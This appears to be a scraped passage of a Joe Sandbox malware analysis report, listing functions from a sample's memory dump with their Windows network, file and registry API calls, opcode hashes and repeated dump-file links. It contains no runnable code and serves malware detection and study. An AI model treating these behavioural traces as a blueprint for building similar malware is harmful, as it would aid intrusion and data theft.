Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 8613e9636e9d2f0b6c0f4f09a130345d0e28994f2b8db67d2f101d403ea2fe00
Instruction ID: 1bc8f05c01a43e4f80ce5d9d66ab3cb253554ce5bea8fcdb0154dad17ce86ff6
Opcode Fuzzy Hash: 8613e9636e9d2f0b6c0f4f09a130345d0e28994f2b8db67d2f101d403ea2fe00
Instruction Fuzzy Hash: 690128367412148FD602CB6EDDC5A597BFAAB882477040564E801EB366CB34EE02CB4C

Function 00415F93 Relevance: 1.5, APIs: 1, Instructions: 39filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(00660CAC,?,000007CF,?,?,?,?,?,?,?,?,?,",?,?,build_id), ref: 00415F5E

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: e65778421bf159a6e9f2282b0f5b70b706a7c724bf39de6aee342938136c1913
Instruction ID: 6481089a7ef5e0497d83b16e2d85378015b74c219217611e750782fe03efe8f3
Opcode Fuzzy Hash: e65778421bf159a6e9f2282b0f5b70b706a7c724bf39de6aee342938136c1913
Instruction Fuzzy Hash: FD0128317092059FD719DB58ECA4AA973F7BF88381B14007CE416C73A2DB60AD159B28

Function 0041CB5C Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041CB35

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 65d66db8e3955ec274538d239d5a7951ed36c2c2988af2b2c57de29bfc7f6b64
Instruction ID: d2f15791ec18b5c67e9392afd22e3770f42c03646b511a034b85998d428c520e
Opcode Fuzzy Hash: 65d66db8e3955ec274538d239d5a7951ed36c2c2988af2b2c57de29bfc7f6b64
Instruction Fuzzy Hash: E1F049B23002059FD744DB6CEC82F6933E5AB88A45F005028AC06D73A6DE65ED15CB59

Function 0042D523 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 0042D57A

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 9cb8932d93fc235599593a89352c7aa2b8be0c6731880565a46e1beeb2b49cd7
Instruction ID: daf9ee533f3dfbc2b2eead8bcce60fa2f38be98557978c355d756c622c7cd5f0
Opcode Fuzzy Hash: 9cb8932d93fc235599593a89352c7aa2b8be0c6731880565a46e1beeb2b49cd7
Instruction Fuzzy Hash: E9F0A4F5512318AFC704DB24CC84C0B3BB8EF89BB5B460599F9068B7A6D634E880CB57

Function 0041BB79 Relevance: 1.5, APIs: 1, Instructions: 35networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(?,?,00000010), ref: 0041BBCA

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: connect
String ID:
API String ID: 1959786783-0
Opcode ID: d29a798e28274b3342516369fb1cfb7983a43e2ad5cce52130b55af28d773a6f
Instruction ID: d6368b448a5408848ead62cf9ffa808a7134cd505ded6333b06fdbbade48ed35
Opcode Fuzzy Hash: d29a798e28274b3342516369fb1cfb7983a43e2ad5cce52130b55af28d773a6f
Instruction Fuzzy Hash: CE011975214700CFC328CF29DC8191AB7F6EF88714B19891DE59AD73A2DB70E845CB19

Function 00418A72 Relevance: 1.5, APIs: 1, Instructions: 34networkCOMMON

Download Yara Rule

APIs

HttpSendRequestA.WININET ref: 00418AA0

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: HttpRequestSend
String ID:
API String ID: 360639707-0
Opcode ID: 9eaf0f0967579a4f0ece616b8c74797151cec0b151fae0a57d679bf813450ff4
Instruction ID: f606ca5c9d67e68a1662a28b00d194a74970b113cb36ceb45a5624646a9dc243
Opcode Fuzzy Hash: 9eaf0f0967579a4f0ece616b8c74797151cec0b151fae0a57d679bf813450ff4
Instruction Fuzzy Hash: 940181B17043059FD710DF28DC89B657BE4AB49315F001ABCB609E7292EA70DC448B50

Function 004200D2 Relevance: 1.5, APIs: 1, Instructions: 33fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 0042011C

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e9559274393a29288dba5252047440199f52af1fbf96400d11fa8ffa2a96019f
Instruction ID: d2e86a65bab16d83351745231fa1efe07a5c89470ef9e76a1f31b562df0f03c6
Opcode Fuzzy Hash: e9559274393a29288dba5252047440199f52af1fbf96400d11fa8ffa2a96019f
Instruction Fuzzy Hash: BBF0AF70A053019BC300FF3DC98044AB7E5BB89254B498528E88083372FB30E946C7D6

Function 0042EC79 Relevance: 1.5, APIs: 1, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119), ref: 0042ECCA

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: bfc11e778280419b37550c5c9b4faecaea55072a1c92e0dd61ea9c10d18ffcc9
Instruction ID: 89709b7e1eaa17e67c4dd8c117d1ea6a7b487138242944f5a495a539a9f0edbb
Opcode Fuzzy Hash: bfc11e778280419b37550c5c9b4faecaea55072a1c92e0dd61ea9c10d18ffcc9
Instruction Fuzzy Hash: 3CF036B4620200BFD220AB19EC59D377BF9EF857397058258F9089B252C6319C11CF51

Function 0042D5FD Relevance: 1.5, APIs: 1, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119), ref: 0042D64C

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a3de9065ab86206e2d597d28a75a7bd5036507eaa8e226b9a857787f7a90b626
Instruction ID: 84ff654c998d5278ecc2a4e3a3df422b09fed67b1349d36c472bba761fda93ce
Opcode Fuzzy Hash: a3de9065ab86206e2d597d28a75a7bd5036507eaa8e226b9a857787f7a90b626
Instruction Fuzzy Hash: A2F0DAB5611321EFE314AB25DD49E1B3BA9FBCD715B4285ACF908DB262C630D820CB51

Function 0041BADA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 0041BB28

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 02ab84589f20e0a38be189373a02f7d0e61845fdd1456813c5e782c9641c13ff
Instruction ID: 46305bdc9776a67e6bc879c66608922c11212b82cc82508f156b2ac646389953
Opcode Fuzzy Hash: 02ab84589f20e0a38be189373a02f7d0e61845fdd1456813c5e782c9641c13ff
Instruction Fuzzy Hash: CBF0F971914349DFD700CF65CC8469ABBE5FF99348F01C62DA85893251EB74EA88CB51

Function 00425D7F Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000), ref: 00425DA4

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 1c09de10b5cb849cdf36bbbfe80766a94f2ab8cf7e9cae6aab980ddc43041fe2
Instruction ID: 3f92480e5b674554efe013d2447c7241dfd4d4f1b58a95d8d60c461ebf04c9de
Opcode Fuzzy Hash: 1c09de10b5cb849cdf36bbbfe80766a94f2ab8cf7e9cae6aab980ddc43041fe2
Instruction Fuzzy Hash: B6F0D43A781224CFDB16DB5EDD88959B7F6EF992073054098E805D7366CB38EE12CA4C

Function 0041D505 Relevance: 1.5, APIs: 1, Instructions: 25filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00001000), ref: 0041D53E

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 83f144d504ea2d7045b3831bae7132a751e13b8ff3c675468cb768f1854f95e2
Instruction ID: ef17851e383a8801deb1b8fb6d163b2d33e52fc386492a57520ff5b9acd140d0
Opcode Fuzzy Hash: 83f144d504ea2d7045b3831bae7132a751e13b8ff3c675468cb768f1854f95e2
Instruction Fuzzy Hash: 00F03039215340DFC718CF15CD55A9BB7E0EF88681B00042DB64297362DB74ED00CA95

Function 0041C189 Relevance: 1.5, APIs: 1, Instructions: 24networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,00000000,00000000,00000000), ref: 0041C1B4

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: acad3e197a75a2de9fa5d7fb054f1fdecf3cd16bf8408248fb7e6bb9b4e8ed24
Instruction ID: 257cfc930a671fa543ebc08773c650428a6695d48d5adb228d48c9221dc59827
Opcode Fuzzy Hash: acad3e197a75a2de9fa5d7fb054f1fdecf3cd16bf8408248fb7e6bb9b4e8ed24
Instruction Fuzzy Hash: 33E09A713002048FD680EBACDC91B1D73E6ABC8755F050228E229E33E2CE24EE458B19

Function 0042F3A6 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 0042F3D9

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: fb9d80b67055780240468b256fea70cbc6f07a5e644a99070cf8cfb3b294a766
Instruction ID: 6d646bb9fd7be8fa06803631e1452873ffc4336ffdc8198b7af79a01931b9827
Opcode Fuzzy Hash: fb9d80b67055780240468b256fea70cbc6f07a5e644a99070cf8cfb3b294a766
Instruction Fuzzy Hash: CAF082765057009BC300EF39C9856597BE1BB8A265F144B2CD8A1972D2E730D995C7C6

Function 0041D57A Relevance: 1.5, APIs: 1, Instructions: 23filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00001000), ref: 0041D53E

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: d2ba0051d0f9b16880bf779fa0dd87794bd9637c4a3284bfaa4a8b0c20d6274a
Instruction ID: d9ab5119059ce9e74a5bef642ce33463750c9f4a77150a4f3a25e2d79b611e23
Opcode Fuzzy Hash: d2ba0051d0f9b16880bf779fa0dd87794bd9637c4a3284bfaa4a8b0c20d6274a
Instruction Fuzzy Hash: 78E01A79315601EFC7188F14DC99EAABBE5EF4C381700045DB653D73A1DB75E804CA6A

Function 0041CB7E Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

PathFileExistsA.SHLWAPI(00000000), ref: 0041CBA7

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
